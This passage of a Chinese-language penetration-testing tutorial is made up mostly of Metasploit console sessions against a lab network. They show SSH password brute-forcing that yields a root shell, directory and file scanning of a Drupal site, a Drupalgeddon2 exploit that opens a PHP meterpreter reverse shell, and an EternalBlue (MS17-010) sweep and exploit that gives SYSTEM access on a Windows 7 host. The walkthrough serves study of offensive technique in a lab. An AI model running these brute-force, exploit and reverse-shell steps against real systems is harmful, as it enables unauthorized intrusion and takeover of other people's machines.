192.33.6.150:22 - Failed: 'r00t:qweasd' [-] 192.33.6.150:22 - Failed: 'r00t:iloveyou' [-] 192.33.6.150:22 - Failed: 'r00t:admin' [-] 192.33.6.150:22 - Failed: 'roots:' [-] 192.33.6.150:22 - Failed: 'roots:root' [-] 192.33.6.150:22 - Failed: 'roots:123456' [-] 192.33.6.150:22 - Failed: 'roots:woaini' [-] 192.33.6.150:22 - Failed: 'roots:qftm' [-] 192.33.6.150:22 - Failed: 'roots:hack' [-] 192.33.6.150:22 - Failed: 'roots:pass1' [-] 192.33.6.150:22 - Failed: 'roots:qweasd' [-] 192.33.6.150:22 - Failed: 'roots:iloveyou' [-] 192.33.6.150:22 - Failed: 'roots:admin' [-] 192.33.6.150:22 - Failed: 'qftm:' [-] 192.33.6.150:22 - Failed: 'qftm:root' [-] 192.33.6.150:22 - Failed: 'qftm:123456' [-] 192.33.6.150:22 - Failed: 'qftm:woaini' [+] 192.33.6.150:22 - Success: 'qftm:qftm' 'uid=0(root) gid=0(root) groups=0(root),24(cdrom),27(sudo),29(audio),44(video) Linux Pentesting 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64 GNU/Linux ' [*] Command shell session 2 opened (192.33.6.150:37349 -> 192.33.6.150:22) at 2020-06-22 22:51:03 -0400 [-] 192.33.6.150:22 - Failed: 'admin:' [-] 192.33.6.150:22 - Failed: 'admin:root' [-] 192.33.6.150:22 - Failed: 'admin:123456' [-] 192.33.6.150:22 - Failed: 'admin:woaini' [-] 192.33.6.150:22 - Failed: 'admin:qftm' [-] 192.33.6.150:22 - Failed: 'admin:hack' [-] 192.33.6.150:22 - Failed: 'admin:pass1' [-] 192.33.6.150:22 - Failed: 'admin:qweasd' [-] 192.33.6.150:22 - Failed: 'admin:iloveyou' [-] 192.33.6.150:22 - Failed: 'admin:admin' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_login) > 

从暴力破解日志结果看到,成功破解了主机192.33.6.150的SSH服务口令,并且MSF自动给我们连接了一个session会话

[+] 192.33.6.150:22 - Success: 'qftm:qftm' 'uid=0(root) gid=0(root) groups=0(root),24(cdrom),27(sudo),29(audio),44(video) Linux Pentesting 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64 GNU/Linux ' [*] Command shell session 2 opened (192.33.6.150:37349 -> 192.33.6.150:22) at 2020-06-22 22:51:03 -0400 

通过sessionID连接进入会话

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 2 [*] Starting interaction with 2... id uid=0(root) gid=0(root) groups=0(root),24(cdrom),27(sudo),29(audio),44(video) whoami root exit [*] 192.33.6.150 - Command shell session 2 closed. Reason: User exit msf5 auxiliary(scanner/ssh/ssh_login) > 
  • 其他服务口令猜解

使用search进行特定搜索

msf5 > search type:auxiliary path:_login Matching Modules ================  - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/mssql/mssql_enum_sql_logins normal No Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration 1 auxiliary/admin/oracle/oracle_login 2008-11-20 normal No Oracle Account Discovery 2 auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt normal No SMB NTLMv1 Login Request Corruption 3 auxiliary/fuzzers/tds/tds_login_corrupt normal No TDS Protocol Login Request Corruption Fuzzer 4 auxiliary/fuzzers/tds/tds_login_username normal No TDS Protocol Login Request Username Fuzzer 5 auxiliary/scanner/afp/afp_login normal No Apple Filing Protocol Login Utility 6 auxiliary/scanner/couchdb/couchdb_login normal No CouchDB Login Utility 7 auxiliary/scanner/ftp/ftp_login normal No FTP Authentication Scanner 8 auxiliary/scanner/http/advantech_webaccess_login normal No Advantech WebAccess Login 9 auxiliary/scanner/http/appletv_login normal No AppleTV AirPlay Login Utility 10 auxiliary/scanner/http/axis_login normal No Apache Axis2 Brute Force Utility 11 auxiliary/scanner/http/bavision_cam_login normal No BAVision IP Camera Web Server Login 12 auxiliary/scanner/http/binom3_login_config_pass_dump normal No Binom3 Web Management Login Scanner, Config and Password File Dump 13 auxiliary/scanner/http/buffalo_login normal No Buffalo NAS Login Utility 14 auxiliary/scanner/http/buildmaster_login normal No Inedo BuildMaster Login Scanner 15 auxiliary/scanner/http/caidao_bruteforce_login normal No Chinese Caidao Backdoor Bruteforce 16 auxiliary/scanner/http/chef_webui_login normal No Chef Web UI Brute Force Utility 17 auxiliary/scanner/http/cisco_firepower_login normal No Cisco Firepower Management Console 6.0 Login 18 auxiliary/scanner/http/cnpilot_r_web_login_loot normal No Cambium cnPilot r200/r201 Login Scanner and Config Dump 19 auxiliary/scanner/http/directadmin_login normal No DirectAdmin Web Control Panel Login Utility 20 auxiliary/scanner/http/dlink_dir_300_615_http_login normal No D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility 21 auxiliary/scanner/http/dlink_dir_615h_http_login normal No D-Link DIR-615H HTTP Login Utility 22 auxiliary/scanner/http/dlink_dir_session_cgi_http_login normal No D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility 23 auxiliary/scanner/http/dolibarr_login normal No Dolibarr ERP/CRM Login Utility 24 auxiliary/scanner/http/epmp1000_web_login normal No Cambium ePMP 1000 Login Scanner 25 auxiliary/scanner/http/etherpad_duo_login normal No EtherPAD Duo Login Bruteforce Utility 26 auxiliary/scanner/http/frontpage_login normal No FrontPage Server Extensions Anonymous Login Scanner 27 auxiliary/scanner/http/gavazzi_em_login_loot normal No Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database 28 auxiliary/scanner/http/gitlab_login normal No GitLab Login Utility 29 auxiliary/scanner/http/glassfish_login normal No GlassFish Brute Force Utility 30 auxiliary/scanner/http/hp_sys_mgmt_login normal No HP System Management Homepage Login Utility 31 auxiliary/scanner/http/http_login normal No HTTP Login Utility 32 auxiliary/scanner/http/ipboard_login normal No IP Board Login Auxiliary Module 33 auxiliary/scanner/http/jenkins_login normal No Jenkins-CI Login Utility 34 auxiliary/scanner/http/joomla_bruteforce_login normal No Joomla Bruteforce Login Utility 35 auxiliary/scanner/http/manageengine_desktop_central_login normal No ManageEngine Desktop Central Login Utility 36 auxiliary/scanner/http/mybook_live_login normal No Western Digital MyBook Live Login Utility 37 auxiliary/scanner/http/octopusdeploy_login normal No Octopus Deploy Login Utility 38 auxiliary/scanner/http/onion_omega2_login 2019-03-27 normal No Onion Omega2 Login Brute-Force 39 auxiliary/scanner/http/openmind_messageos_login normal No OpenMind Message-OS Portal Login Brute Force Utility 40 auxiliary/scanner/http/oracle_ilom_login normal No Oracle ILO Manager Login Brute Force Utility 41 auxiliary/scanner/http/owa_ews_login normal No OWA Exchange Web Services (EWS) Login Scanner 42 auxiliary/scanner/http/owa_login normal No Outlook Web App (OWA) Brute Force Utility 43 auxiliary/scanner/http/phpmyadmin_login normal No PhpMyAdmin Login Scanner 44 auxiliary/scanner/http/pocketpad_login normal No PocketPAD Login Bruteforce Force Utility 45 auxiliary/scanner/http/splunk_web_login normal No Splunk Web Interface Login Utility 46 auxiliary/scanner/http/symantec_web_gateway_login normal No Symantec Web Gateway Login Utility 47 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility 48 auxiliary/scanner/http/vcms_login normal No V-CMS Login Utility 49 auxiliary/scanner/http/wordpress_login_enum normal No WordPress Brute Force and User Enumeration Utility 50 auxiliary/scanner/http/wordpress_xmlrpc_login normal No WordPress XML-RPC Username/Password Login Scanner 51 auxiliary/scanner/http/zabbix_login normal No Zabbix Server Brute Force Utility 52 auxiliary/scanner/lotus/lotus_domino_login normal No Lotus Domino Brute Force Utility 53 auxiliary/scanner/misc/cctv_dvr_login normal No CCTV DVR Login Scanning Utility 54 auxiliary/scanner/misc/ibm_mq_login normal No IBM WebSphere MQ Login Check 55 auxiliary/scanner/mongodb/mongodb_login normal No MongoDB Login Utility 56 auxiliary/scanner/msf/msf_rpc_login normal No Metasploit RPC Interface Login Utility 57 auxiliary/scanner/msf/msf_web_login normal No Metasploit Web Interface Login Utility 58 auxiliary/scanner/mssql/mssql_login normal No MSSQL Login Utility 59 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility 60 auxiliary/scanner/nessus/nessus_ntp_login normal No Nessus NTP Login Utility 61 auxiliary/scanner/nessus/nessus_rest_login normal No Nessus RPC Interface Login Utility 62 auxiliary/scanner/nessus/nessus_xmlrpc_login normal No Nessus XMLRPC Interface Login Utility 63 auxiliary/scanner/nexpose/nexpose_api_login normal No NeXpose API Interface Login Utility 64 auxiliary/scanner/nntp/nntp_login normal No NNTP Login Utility 65 auxiliary/scanner/openvas/openvas_gsad_login normal No OpenVAS gsad Web Interface Login Utility 66 auxiliary/scanner/openvas/openvas_omp_login normal No OpenVAS OMP Login Utility 67 auxiliary/scanner/openvas/openvas_otp_login normal No OpenVAS OTP Login Utility 68 auxiliary/scanner/oracle/isqlplus_login normal No Oracle iSQL*Plus Login Utility 69 auxiliary/scanner/oracle/oracle_login normal No Oracle RDBMS Login Utility 70 auxiliary/scanner/pcanywhere/pcanywhere_login normal No PcAnywhere Login Scanner 71 auxiliary/scanner/pop3/pop3_login normal No POP3 Login Utility 72 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility 73 auxiliary/scanner/redis/redis_login normal No Redis Login Utility 74 auxiliary/scanner/rservices/rexec_login normal No rexec Authentication Scanner 75 auxiliary/scanner/rservices/rlogin_login normal No rlogin Authentication Scanner 76 auxiliary/scanner/rservices/rsh_login normal No rsh Authentication Scanner 77 auxiliary/scanner/sap/sap_mgmt_con_brute_login normal No SAP Management Console Brute Force 78 auxiliary/scanner/sap/sap_soap_rfc_brute_login normal No SAP SOAP Service RFC_PING Login Brute Forcer 79 auxiliary/scanner/sap/sap_web_gui_brute_login normal No SAP Web GUI Login Brute Forcer 80 auxiliary/scanner/scada/koyo_login 2012-01-19 normal No Koyo DirectLogic PLC Password Brute Force Utility 81 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner 82 auxiliary/scanner/snmp/snmp_login normal No SNMP Community Login Scanner 83 auxiliary/scanner/ssh/karaf_login normal No Apache Karaf Login Utility 84 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner 85 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner 86 auxiliary/scanner/telnet/brocade_enable_login normal No Brocade Enable Login Check Scanner 87 auxiliary/scanner/telnet/telnet_login normal No Telnet Login Check Scanner 88 auxiliary/scanner/teradata/teradata_odbc_login 2018-03-30 normal No Teradata ODBC Login Scanner Module 89 auxiliary/scanner/varnish/varnish_cli_login normal No Varnish Cache CLI Login Utility 90 auxiliary/scanner/vmware/vmauthd_login normal No VMWare Authentication Daemon Login Scanner 91 auxiliary/scanner/vmware/vmware_http_login normal No VMWare Web Login Scanner 92 auxiliary/scanner/vnc/vnc_login normal No VNC Authentication Scanner 93 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility 94 auxiliary/voip/asterisk_login normal No Asterisk Manager Login Utility msf5 > 

网站敏感目录扫描

可以借助 Metasploit 中的 brute_dirs、dir_listing、dir_scanner 等辅助模块来进行网站敏感目录扫描。

他们主要使用暴力猜解的方式工作,注意此处需要提供一个目录字典。

msf5 > use auxiliary/scanner/http/dir_scanner msf5 auxiliary(scanner/http/dir_scanner) > show options Module options (auxiliary/scanner/http/dir_scanner): Name Current Setting Required Description ---- --------------- -------- ----------- DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt no Path of word dictionary to use PATH / yes The path to identify files Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.33.6.147 rhosts => 192.33.6.147 msf5 auxiliary(scanner/http/dir_scanner) > set threads 50 threads => 50 msf5 auxiliary(scanner/http/dir_scanner) > show options Module options (auxiliary/scanner/http/dir_scanner): Name Current Setting Required Description ---- --------------- -------- ----------- DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt no Path of word dictionary to use PATH / yes The path to identify files Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.33.6.147 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections THREADS 50 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host msf5 auxiliary(scanner/http/dir_scanner) > run [*] Detecting error code [*] Using code '404' as not found for 192.33.6.147 [+] Found http://192.33.6.147:80/.../ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/.CVS/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/0/ 200 (192.33.6.147) [+] Found http://192.33.6.147:80/Admin/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/USER/ 200 (192.33.6.147) [+] Found http://192.33.6.147:80/admin/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/batch/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/cgi-bin/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/icons/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/includes/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/misc/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/modules/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/node/ 200 (192.33.6.147) [+] Found http://192.33.6.147:80/profiles/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/scripts/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/search/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/sites/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/themes/ 403 (192.33.6.147) [+] Found http://192.33.6.147:80/user/ 200 (192.33.6.147) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/http/dir_scanner) > 

网站敏感文件扫描

通过控制台执行系统命令,运行第三方下载的工具进行敏感文件的扫描

msf5 > python3 dirsearch.py -u http://192.33.6.147 -e * [*] exec: python3 dirsearch.py -u http://192.33.6.147 -e * _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: CHANGELOG.md | HTTP method: get | Threads: 10 | Wordlist size: 6130 Error Log: /mnt/hgfs/QSec/Pentest/dirsearch/logs/errors-20-06-23_12-12-54.log Target: http://192.33.6.147 [12:12:54] Starting: [12:13:02] 200 - 7KB - /0 [12:17:13] 301 - 315B - /includes -> http://192.33.6.147/includes/ [12:17:18] 200 - 7KB - /index.php [12:17:20] 200 - 17KB - /INSTALL [12:17:21] 403 - 291B - /install.inc [12:17:21] 403 - 293B - /INSTALL.mysql [12:17:21] 403 - 293B - /install.mysql [12:17:21] 200 - 1KB - /INSTALL.mysql.txt [12:17:22] 403 - 293B - /INSTALL.pgsql [12:17:22] 403 - 293B - /install.pgsql [12:17:22] 200 - 2KB - /INSTALL.pgsql.txt [12:17:22] 403 - 291B - /install.sql [12:17:22] 403 - 291B - /install.tpl [12:17:22] 200 - 17KB - /INSTALL.txt [12:17:22] 200 - 3KB - /install.php [12:17:37] 200 - 18KB - /LICENSE [12:17:37] 200 - 18KB - /LICENSE.txt [12:18:23] 200 - 7KB - /node [12:18:29] 403 - 290B - /orders.sql [12:19:10] 301 - 315B - /profiles -> http://192.33.6.147/profiles/ [12:19:10] 403 - 309B - /profiles/minimal/minimal.info [12:19:10] 403 - 311B - /profiles/standard/standard.info [12:19:10] 403 - 309B - /profiles/testing/testing.info [12:19:16] 200 - 5KB - /README [12:19:17] 200 - 5KB - /README.txt [12:19:22] 403 - 292B - /revision.inc [12:19:22] 200 - 2KB - /robots.txt [12:19:22] 403 - 284B - /Root [12:19:24] 403 - 289B - /sales.sql [12:19:25] 403 - 290B - /schema.sql [12:19:26] 301 - 314B - /scripts -> http://192.33.6.147/scripts/ [12:20:32] 200 - 9KB - /UPGRADE [12:20:33] 200 - 9KB - /UPGRADE.txt [12:20:38] 200 - 7KB - /user [12:20:38] 200 - 7KB - /user/ [12:20:48] 200 - 2KB - /web.config [12:21:03] 200 - 42B - /xmlrpc.php Task Completed msf5 > 

Drupal组件渗透

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。

  • 信息收集

前期的情报搜集得到主机192.33.6.147、开放80端口,尝试访问继续探索

使用wappalyzer探索其网站框架为Drupal、且版本为7Debian Apache 2.2.22 PHP 5.4.45

后续利用Metasploit进行渗透测试

  • 搜索相关模块
msf5 > search drupal Matching Modules ================  - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entiy Injection 1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Eumeration 2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Vlue SQL Injection 3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote ommand Execution 4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 FormsAPI Property Injection 5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module RemotePHP Code Execution 6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Servicesunserialize() RCE 7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code xecution msf5 > 
  • 模块配置
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options Module options (exploit/unix/webapp/drupal_drupalgeddon2): Name Current Setting Required Description DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host Payload options (multi/meterpreter/reverse_https): Name Current Setting Required Description LHOST 192.33.6.150 yes The local listener hostname LPORT 8443 yes The local listener port LURI no The HTTP Path Exploit target: Id Name 0 Automatic (PHP In-Memory) msf5 exploit(unix/webapp/drupal_drupalgeddon2) > msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.33.6.147 rhosts => 192.33.6.147 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show targets Exploit targets: Id Name 0 Automatic (PHP In-Memory) 1 Automatic (PHP Dropper) 2 Automatic (Unix In-Memory) 3 Automatic (Linux Dropper) 4 Drupal 7.x (PHP In-Memory) 5 Drupal 7.x (PHP Dropper) 6 Drupal 7.x (Unix In-Memory) 7 Drupal 7.x (Linux Dropper) 8 Drupal 8.x (PHP In-Memory) 9 Drupal 8.x (PHP Dropper) 10 Drupal 8.x (Unix In-Memory) 11 Drupal 8.x (Linux Dropper) msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options Module options (exploit/unix/webapp/drupal_drupalgeddon2): Name Current Setting Required Description DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][] RHOSTS 192.33.6.147 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description LHOST 192.33.6.150 yes The listen address (an interface may be specified) LPORT 8443 yes The listen port Exploit target: Id Name 0 Automatic (PHP In-Memory) msf5 exploit(unix/webapp/drupal_drupalgeddon2) > 
  • 攻击获取会话
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit [] Started reverse TCP handler on 192.33.6.150:8443 [] Sending stage (38288 bytes) to 192.33.6.147 [*] Meterpreter session 1 opened (192.33.6.150:8443 -> 192.33.6.147:57700) at 2020-06-23 22:59:04 -0400 meterpreter > meterpreter > getuid Server username: www-data (33) meterpreter > 

永恒之蓝

  • 信息收集

使用MSF辅助模块扫描内网中存在“永恒之蓝”的主机

搜索相关辅助模块

msf5 > search type:auxiliary path:ms17_010 Matching Modules Name Disclosure Date Rank Check Description 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection msf5 > 

配置相关辅助模块进行探测

msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.33.6.0/24 rhosts => 192.33.6.0/24 msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 50 threads => 50 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS 192.33.6.0/24 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 50 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/smb/smb_ms17_010) > 

配置完毕之后开始运行检测

msf5 auxiliary(scanner/smb/smb_ms17_010) > run [-] 192.33.6.1:445 - An SMB Login Error occurred while connecting to the IPC$ tree. [] 192.33.6.0/24:445 - Scanned 31 of 256 hosts (12% complete) [] 192.33.6.0/24:445 - Scanned 53 of 256 hosts (20% complete) [] 192.33.6.0/24:445 - Scanned 81 of 256 hosts (31% complete) [] 192.33.6.0/24:445 - Scanned 104 of 256 hosts (40% complete) [+] 192.33.6.151:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit) [] 192.33.6.0/24:445 - Scanned 132 of 256 hosts (51% complete) [] 192.33.6.0/24:445 - Scanned 155 of 256 hosts (60% complete) [] 192.33.6.0/24:445 - Scanned 181 of 256 hosts (70% complete) [] 192.33.6.0/24:445 - Scanned 205 of 256 hosts (80% complete) [] 192.33.6.0/24:445 - Scanned 243 of 256 hosts (94% complete) [] 192.33.6.0/24:445 - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_ms17_010) > 

检测到内网主机Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit) 192.33.6.151存在永恒之蓝漏洞

  • 漏洞攻防

搜索相关攻击模块

msf5 > search type:exploit path:ms17_010 Matching Modules Name Disclosure Date Rank Check Description 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution msf5 > 

配置攻击模块

msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.33.6.151 rhosts => 192.33.6.151 msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 2222 lport => 2222 msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets Exploit targets: Id Name 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description RHOSTS 192.33.6.151 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘ RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description EXITFUNC thread yes Exit technique (Accepted: ‘’, seh, thread, process, none) LHOST 192.33.6.150 yes The listen address (an interface may be specified) LPORT 2222 yes The listen port Exploit target: Id Name 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > 

攻击获取会话

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [] Started reverse TCP handler on 192.33.6.150:2222 [] 192.33.6.151:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.33.6.151:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit) [] 192.33.6.151:445 - Scanned 1 of 1 hosts (100% complete) [] 192.33.6.151:445 - Connecting to target for exploitation. [+] 192.33.6.151:445 - Connection established for exploitation. [+] 192.33.6.151:445 - Target OS selected valid for OS indicated by SMB reply [] 192.33.6.151:445 - CORE raw buffer dump (40 bytes) [] 192.33.6.151:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp [] 192.33.6.151:445 - 0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic [] 192.33.6.151:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1 [+] 192.33.6.151:445 - Target arch selected valid for arch indicated by DCE/RPC reply [] 192.33.6.151:445 - Trying exploit with 12 Groom Allocations. [] 192.33.6.151:445 - Sending all but last fragment of exploit packet [] 192.33.6.151:445 - Starting non-paged pool grooming [+] 192.33.6.151:445 - Sending SMBv2 buffers [+] 192.33.6.151:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [] 192.33.6.151:445 - Sending final SMBv2 buffers. [] 192.33.6.151:445 - Sending last fragment of exploit packet! [] 192.33.6.151:445 - Receiving response from exploit packet [+] 192.33.6.151:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [] 192.33.6.151:445 - Sending egg to corrupted connection. [] 192.33.6.151:445 - Triggering free of corrupted buffer. [] Sending stage (201283 bytes) to 192.33.6.151 [] Meterpreter session 2 opened (192.33.6.150:2222 -> 192.33.6.151:49296) at 2020-06-23 23:34:33 -0400 [+] 192.33.6.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.33.6.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.33.6.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > getuid Server username: NT AUTHORITYSYSTEM meterpreter > 

会话切换

meterpreter > bg [*] Backgrounding session 2… msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i Active sessions =============== Id Name Type Information Connection 1 meterpreter php/linux www-data (33) @ DC-1 192.33.6.150:8443 -> 192.33.6.147:57700 (192.33.6.147) 2 meterpreter x64/windows NT AUTHORITYSYSTEM @ WIN-5DTIE0M734E 192.33.6.150:2222 -> 192.33.6.151:49296 (192.33.6.151) msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2 [*] Starting interaction with 2… meterpreter > getuid Server username: NT AUTHORITYSYSTEM meterpreter > 

